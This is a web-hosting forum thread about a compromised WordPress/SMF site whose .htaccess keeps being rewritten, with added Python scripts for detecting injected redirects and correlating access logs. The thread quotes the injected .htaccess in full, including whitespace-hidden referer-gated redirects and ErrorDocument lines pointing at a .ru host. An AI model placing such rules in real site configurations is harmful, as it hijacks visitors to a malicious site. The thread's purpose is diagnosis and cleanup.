htaccess nightmare

Someone or something keeps editing the htaccess files on my website and I'm struggling to resolve it.

My website consists of two parts: WordPress for the homepage and SMF for the forum. Both WordPress and SMF are the current versions and all plugins are up to date. I've created a backup of the entire site, downloaded it to my PC and scanned it with Webroot and Malwarebytes, but they both fail to find anything.

I've just edited the htaccess file back and Sucuri SiteCheck reports everything is OK. However, within an hour I can pretty much guarantee they've been edited again.

Can anyone advise me on what to try next?
 
I've already reset the FTP password (lower and upper case, mix of letters and numbers).

At present the htaccess file is -

Code:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

When it keeps getting edited it looks like this (Scroll right) -

Code:
																										<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
																														RewriteRule ^(.*)$ http://emisacbannortim.ru/upday/index.php [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://emisacbannortim.ru/upday/index.php [R=301,L]																														
																														</IfModule>																														
																																																												






# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress




















































																																																												
																														ErrorDocument 400 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 401 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 403 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 404 http://emisacbannortim.ru/upday/index.php																														
																														ErrorDocument 500 http://emisacbannortim.ru/upday/index.php
 
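Added example (not part of the original thread): a small Python check for the three things visible in the edited file above, namely a referer-gated `RewriteRule` pointing at a foreign host, `ErrorDocument` lines pointing at a foreign URL, and whitespace padding that pushes directives out of view. The thresholds, the function names and the `redirect.invalid` placeholder host are assumptions made for this illustration.

```python
import re
from urllib.parse import urlparse

PAD_COLS = 20    # assumed threshold: indentation that pushes a directive off-screen
BLANK_RUN = 10   # assumed threshold: blank lines used to bury later directives
def _external_host(target, own_hosts):
    """Hostname of an absolute http(s) target that is not one of ours, else None."""
    if not re.match(r"https?://", target, re.I):
        return None
    host = (urlparse(target).hostname or "").lower()
    return host if host and host not in own_hosts else None

def scan_htaccess(text, own_hosts=()):
    """Return (line_no, reason) findings for injected-redirect patterns."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond, blanks = [], False, 0
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            blanks += 1
            if blanks == BLANK_RUN:
                findings.append((no, "long run of blank lines"))
            continue
        blanks = 0
        if len(raw) - len(raw.lstrip()) >= PAD_COLS:
            findings.append((no, "directive hidden behind whitespace padding"))
        name = parts[0].lower()
        if name == "rewritecond":
            referer_cond = referer_cond or "%{http_referer}" in raw.lower()
        elif name == "rewriterule":
            host = _external_host(parts[2], own) if len(parts) > 2 else None
            if host:
                kind = "referer-gated" if referer_cond else "unconditional"
                findings.append((no, f"{kind} redirect to {host}"))
            referer_cond = False  # conditions bind only to the next RewriteRule
        elif name == "errordocument" and len(parts) > 2:
            host = _external_host(parts[2], own)
            if host:
                findings.append((no, f"ErrorDocument {parts[1]} sent to {host}"))
    return findings
# Constructed sample shaped like the edited file above; redirect.invalid is a placeholder.
PAD = "\t" * 30
SAMPLE = "\n".join([
    PAD + r"RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\.(.*)",
    PAD + "RewriteRule ^(.*)$ http://redirect.invalid/upday/index.php [R=301,L]",
    *[""] * 12,
    "RewriteRule . /index.php [L]",
    PAD + "ErrorDocument 404 http://redirect.invalid/upday/index.php",
])
```

Run against every `.htaccess` under the web root (WordPress and SMF directories alike) and pass the site's own hostnames as `own_hosts` so legitimate canonical redirects are not reported.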
This is almost always caused by your FTP credentials being hacked - I'd recommend changing your passwords and scanning any computers you use for FTP for malware.

I've changed the FTP password already, Daz, using the cPanel password generator (lower/upper case, letters and numbers), but htaccess had been edited again since.

Only two machines have FTP access and both have been scanned with Webroot and Malwarebytes, but nothing was found.
 
It's funny you mention that. The htaccess file was last modified at 15:18. Using cPanel I could see a Russian IP address access the site at the same time and access a weird-looking PHP file.

My knowledge of PHP is next to nothing but the file name "871368108093.php" looked out of place compared to the rest in that folder.

I've looked at the file but I don't know if the contents are sinister or not.
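Added example (not part of the original thread): the correlation described in the post above, done in Python by listing PHP requests logged within a minute of the `.htaccess` modification time and flagging all-digit script names. It assumes Apache common/combined-format access logs; the log lines, IP addresses, paths and function name are constructed for illustration.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache common/combined access-log prefix: ip, timestamp, request line, status.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def php_requests_near(log_lines, modified_at, window_s=60):
    """PHP requests logged within window_s seconds of a file's modification time."""
    window = timedelta(seconds=window_s)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]
        if abs(when - modified_at) > window or not path.lower().endswith(".php"):
            continue
        name = path.rsplit("/", 1)[-1]
        hits.append({
            "ip": m["ip"], "method": m["method"], "path": path,
            "status": int(m["status"]),
            # an all-digit script name, like the one in the post, stands out
            "numeric_name": re.fullmatch(r"\d+\.php", name, re.I) is not None,
        })
    # Most suspicious first: numeric names, then POSTs.
    return sorted(hits, key=lambda h: (not h["numeric_name"], h["method"] != "POST"))

# Constructed log lines (documentation IP ranges, made-up paths and times).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:15:17:40 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.50 - - [01/Jan/2024:15:18:02 +0000] "POST /uploads/123456789012.php HTTP/1.1" 200 17',
    '198.51.100.7 - - [01/Jan/2024:15:40:00 +0000] "GET /forum/index.php HTTP/1.1" 200 9000',
]
# On a live host, take this from the file itself:
# datetime.fromtimestamp(os.stat(".htaccess").st_mtime, tz=timezone.utc)
MODIFIED = datetime(2024, 1, 1, 15, 18, 5, tzinfo=timezone.utc)
```

Any script this surfaces should be preserved for inspection before deletion, and its own creation time fed back into the same function to find the request that uploaded it.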
 
Thanks Locke. I've deleted it and asked my host to change the root password.

I ensured all packages were up to date yesterday but failed to spot that php file until this afternoon.
 